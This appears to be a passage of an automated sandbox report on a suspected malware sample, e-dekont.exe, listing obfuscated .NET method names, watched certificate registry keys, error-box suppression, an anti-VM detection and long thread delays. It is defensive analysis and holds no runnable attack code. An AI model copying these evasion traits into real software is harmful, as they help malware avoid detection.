            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, CY9iQ9UQIfrGylb4q6.csHigh entropy of concatenated method names: 'vpWhK7orJA', 'dvrhY5ZOms', 'MebhN8rPCo', 'yt1NJsdvTr', 'qovNzBxmLh', 'GiKhTD63Sb', 'YkohSFYS9F', 'FHJhGlO2cB', 'towhb2BRAP', 'eEbheCq6ha'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, mleEQrRUKsxHalQgKV.csHigh entropy of concatenated method names: 'sR2hUjkjuY', 'CI7hswiGpZ', 'udihPInVh4', 'u1MhEAlS8C', 'RCchtH9qYP', 'YgGhnIoph7', 'G0Ghf5q8jx', 'pAAhAk5lSV', 'RZFhq2f2o4', 'fVchQpnF2G'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.csHigh entropy of concatenated method names: 'hXybwoSpjL', 'wwLbKT9WiK', 'A66bWtOqX8', 'Gi9bYQAxOl', 'YQJb61AoqN', 'RmNbNdJuAm', 'h6AbhK2Ief', 'kQHbuDpAmO', 'NnmbLym8SI', 'gh6bO74BP5'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, dTtXywlp86sra2ZdK5.csHigh entropy of concatenated method names: 'YfvW3Nv924', 'k5HWcdw4bv', 'UjCW1lP4XK', 'XX4WyG6Vc1', 'BLNW59pmUg', 'R5aWdX9baC', 'FNqWH3Yeyj', 'qTsWikWrAt', 'Ix9WaKtdJK', 'yVoWJxDpV8'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, vCntCIAQv8LQSynJxw.csHigh entropy of concatenated method names: 'b8tNwgwHEK', 'lKlNWSxC3u', 'aFsN6K63RU', 'I4gNhheH02', 'CONNuBxD25', 'sfI652WpJf', 'q6a6dcQdbc', 'NYA6HrqfEI', 'CG96i8YQBS', 'eRV6aL0xFc'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sIoks92u7sGwTcwfTc.csHigh entropy of concatenated method names: 'Dispose', 'PUwSaYWp5V', 'uy7GC2ZiSR', 'KU977WqTaB', 'gvQSJ5BSZb', 'ra0SzybWl7', 'ProcessDialogKey', 'Er8GTL9Oe5', 'lqtGSfZrZc', 'RkVGGBEoHK'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, o9fI1yvIhFCGn4Lj8I.csHigh entropy of concatenated method names: 'enFShZH9cB', 'ff0SuUUkHH', 'Ae2SOkAwoN', 'vQWSkKm5Ay', 'XfcS2KAMMc', 'nVeSg1ZQfL', 'iLaCOt7LcTlUfSLaac', 'Mhx1tcyPEOXdEtyN5n', 'AOPoATGyn5Dr9cLuQ5', 'pI3SSHISBU'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sbP0BMFZWXXPlLosyI.csHigh entropy of concatenated method names: 'DpLVAQa1xh', 'aiyVqdWXLN', 'qpQVMYLlQp', 'N39VCYn3OK', 'q3kVD4HA5h', 'DyeV4BscSc', 'Wn4VlZc1bS', 'kNHVvxfJfo', 'oNSVm6vDpK', 'fnvVZcAeYl'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, knCdjVGr83uL8hhtgn.csHigh entropy of concatenated method names: 'WXw0K1hMX7', 'alD0WekIPk', 'etV0YUMVTL', 'Thw06l0ppY', 'bSU0Nr1UdS', 'xNJ0h3Yk9G', 'rFu0uNj1WT', 'AUD0L9p0sn', 'jQX0OiuP6m', 'PVA0kfpP3C'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, EP2N8kZihyVdcM1idG.csHigh entropy of concatenated method names: 'YR5N1GnYKI', 'LxxNybEF8e', 'RNON5OPUi1', 'ToString', 'cIlNdolAZ6', 'RcKNH7G8bx', 'BywWSQZI3G7SFrmadrb', 'usOr7lZ9hQ2J7wMoraq', 'c8A6MhZU2edj2bXVebJ'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, iJAQ07YkZftAiMs5moQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yrnr3CSHWV', 'XnUrcHUgFo', 'OyVr17lhjB', 'AfUryghEWy', 'RaXr5Y9XA3', 'O1urds94Gx', 'YQjrHK7qmG'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sW8unUTVCmAe5wJ2kF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ax2GarCKHH', 'sMcGJpgUx7', 'AIWGzj3W4M', 'BYbbT69Si4', 'Dj5bS11gX1', 'ykhbGOpRYb', 'YsSbbh072T', 'P1f8RgOu7Vv5tcGXTlT'
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, KWjDk4zb0JGixMxZ7j.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a3TjVatgX3', 'f2oj2h02U9', 'zHTjgcjwR9', 'D6kjFPJYem', 'Vanj0B7qac', 'GQdjjYvP3s', 'HEyjrIHOVT'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, GFmq6jeWw2VPHLdjXQ.csHigh entropy of concatenated method names: 'PRL0M0SX9U', 'NuD0Ca4lgp', 'S3u0pLnMDB', 'hp20DsVE5H', 'hOB03rn42v', 'ffj04xGQTX', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, SBhr37Eba3HGHsc4GS.csHigh entropy of concatenated method names: 'FrsFiYwdUH', 'CgEFJFbBj6', 'v1G0TuhbKD', 'IFn0StgSqy', 'prAFZkVctd', 'gQbFxw7Btq', 'pkuFByijjg', 'rc3F3v6M8i', 'MvNFcZrPNx', 'zniF1Nn5Us'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, SokUCaY3uiJOKtiAys2.csHigh entropy of concatenated method names: 'eDWjUoqhn4', 'nFyjsbI1r5', 'HiojPcDeCw', 'eW2jEELp8N', 'gx5jtvIBvd', 'IxjjngxuBg', 'o0KjfiX5ye', 'RFijAgOQES', 'vRajq8Fcec', 'cOYjQf5x9T'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, YSg4KxWDvO5g0WLFjV.csHigh entropy of concatenated method names: 'cweYEQc6ed', 'HjDYnXUG6F', 'fMMYAaLRY6', 'AdFYqZUW1F', 'RN3Y2a2CwI', 'QjkYgWVBDN', 'PNvYF7Qi9l', 'TmfY08ys7p', 'wXtYjouk3Z', 'fE9Yr18YDF'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, K0BC4Ea55hp7C27VHS.csHigh entropy of concatenated method names: 'TQKNo1LuXs', 'kQtNUhxOUD', 'KI1NPFiESx', 'OyqNETO8S4', 'npmNn4TV2v', 'mYCNfHbjhD', 'Q7uNqoAhdw', 'SfrNQKxNU3', 'UrfqPBZeGWxXjrgcSRs', 'UQ5KDuZq40ZgwfJdeiB'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, gKGHQrtfF8pAIlCF7W.csHigh entropy of concatenated method names: 'ay4jSBJLtc', 'QehjbSroLC', 'lCAje9gyo9', 'DGYjKLWkry', 'K7sjWu06va', 'nD8j6wAQ9Y', 'OBljNvBXQk', 'GcG0H2dZd6', 'G1o0igXqop', 'RZf0aqYqL4'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, mg7ueT58ImXGqb211X.csHigh entropy of concatenated method names: 'N4IFONfuOj', 'D91FkosvTG', 'ToString', 'NDYFKb8j0E', 'gA0FWa4Sf0', 'HcjFYjbqZK', 'PmWF6MVbbI', 'uiQFNbM75v', 'xGwFh4tYNp', 'DoGFugXCgZ'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, LIgXRi1giEMrRmxvTU.csHigh entropy of concatenated method names: 'BAX2my8DYJ', 'PAu2xNOBiy', 'oHf23v0pYJ', 'G6V2ckQNRu', 'jtc2CcDpVO', 'z0N2pacRBT', 'dvQ2DmDIIE', 'c1124pxbyn', 'AGX29ygSkw', 'WEM2lE8isd'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, eNAIGeMhT6QTnJZQ2c.csHigh entropy of concatenated method names: 'S5bPtZHrU', 'Xu4E0Z48e', 'oPfnqwjRY', 'D9qfdNRD9', 'RyZqD81iX', 'x1CQbZpV3', 'cwDIZU5gTwhp5CqvsF', 'LwFq4PIDUU5RVsWInQ', 'FmO0Qc1iG', 'SXsr21pK9'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, CY9iQ9UQIfrGylb4q6.csHigh entropy of concatenated method names: 'vpWhK7orJA', 'dvrhY5ZOms', 'MebhN8rPCo', 'yt1NJsdvTr', 'qovNzBxmLh', 'GiKhTD63Sb', 'YkohSFYS9F', 'FHJhGlO2cB', 'towhb2BRAP', 'eEbheCq6ha'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, mleEQrRUKsxHalQgKV.csHigh entropy of concatenated method names: 'sR2hUjkjuY', 'CI7hswiGpZ', 'udihPInVh4', 'u1MhEAlS8C', 'RCchtH9qYP', 'YgGhnIoph7', 'G0Ghf5q8jx', 'pAAhAk5lSV', 'RZFhq2f2o4', 'fVchQpnF2G'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.csHigh entropy of concatenated method names: 'hXybwoSpjL', 'wwLbKT9WiK', 'A66bWtOqX8', 'Gi9bYQAxOl', 'YQJb61AoqN', 'RmNbNdJuAm', 'h6AbhK2Ief', 'kQHbuDpAmO', 'NnmbLym8SI', 'gh6bO74BP5'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, dTtXywlp86sra2ZdK5.csHigh entropy of concatenated method names: 'YfvW3Nv924', 'k5HWcdw4bv', 'UjCW1lP4XK', 'XX4WyG6Vc1', 'BLNW59pmUg', 'R5aWdX9baC', 'FNqWH3Yeyj', 'qTsWikWrAt', 'Ix9WaKtdJK', 'yVoWJxDpV8'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, vCntCIAQv8LQSynJxw.csHigh entropy of concatenated method names: 'b8tNwgwHEK', 'lKlNWSxC3u', 'aFsN6K63RU', 'I4gNhheH02', 'CONNuBxD25', 'sfI652WpJf', 'q6a6dcQdbc', 'NYA6HrqfEI', 'CG96i8YQBS', 'eRV6aL0xFc'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sIoks92u7sGwTcwfTc.csHigh entropy of concatenated method names: 'Dispose', 'PUwSaYWp5V', 'uy7GC2ZiSR', 'KU977WqTaB', 'gvQSJ5BSZb', 'ra0SzybWl7', 'ProcessDialogKey', 'Er8GTL9Oe5', 'lqtGSfZrZc', 'RkVGGBEoHK'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, o9fI1yvIhFCGn4Lj8I.csHigh entropy of concatenated method names: 'enFShZH9cB', 'ff0SuUUkHH', 'Ae2SOkAwoN', 'vQWSkKm5Ay', 'XfcS2KAMMc', 'nVeSg1ZQfL', 'iLaCOt7LcTlUfSLaac', 'Mhx1tcyPEOXdEtyN5n', 'AOPoATGyn5Dr9cLuQ5', 'pI3SSHISBU'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sbP0BMFZWXXPlLosyI.csHigh entropy of concatenated method names: 'DpLVAQa1xh', 'aiyVqdWXLN', 'qpQVMYLlQp', 'N39VCYn3OK', 'q3kVD4HA5h', 'DyeV4BscSc', 'Wn4VlZc1bS', 'kNHVvxfJfo', 'oNSVm6vDpK', 'fnvVZcAeYl'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, knCdjVGr83uL8hhtgn.csHigh entropy of concatenated method names: 'WXw0K1hMX7', 'alD0WekIPk', 'etV0YUMVTL', 'Thw06l0ppY', 'bSU0Nr1UdS', 'xNJ0h3Yk9G', 'rFu0uNj1WT', 'AUD0L9p0sn', 'jQX0OiuP6m', 'PVA0kfpP3C'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, EP2N8kZihyVdcM1idG.csHigh entropy of concatenated method names: 'YR5N1GnYKI', 'LxxNybEF8e', 'RNON5OPUi1', 'ToString', 'cIlNdolAZ6', 'RcKNH7G8bx', 'BywWSQZI3G7SFrmadrb', 'usOr7lZ9hQ2J7wMoraq', 'c8A6MhZU2edj2bXVebJ'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, iJAQ07YkZftAiMs5moQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yrnr3CSHWV', 'XnUrcHUgFo', 'OyVr17lhjB', 'AfUryghEWy', 'RaXr5Y9XA3', 'O1urds94Gx', 'YQjrHK7qmG'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sW8unUTVCmAe5wJ2kF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ax2GarCKHH', 'sMcGJpgUx7', 'AIWGzj3W4M', 'BYbbT69Si4', 'Dj5bS11gX1', 'ykhbGOpRYb', 'YsSbbh072T', 'P1f8RgOu7Vv5tcGXTlT'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, KWjDk4zb0JGixMxZ7j.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a3TjVatgX3', 'f2oj2h02U9', 'zHTjgcjwR9', 'D6kjFPJYem', 'Vanj0B7qac', 'GQdjjYvP3s', 'HEyjrIHOVT'
            Source: C:\Users\user\Desktop\e-dekont.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 9B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: AB60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: AF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: BF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: CF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeMemory allocated: 4FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599543Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597446Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596547Jump to behavior
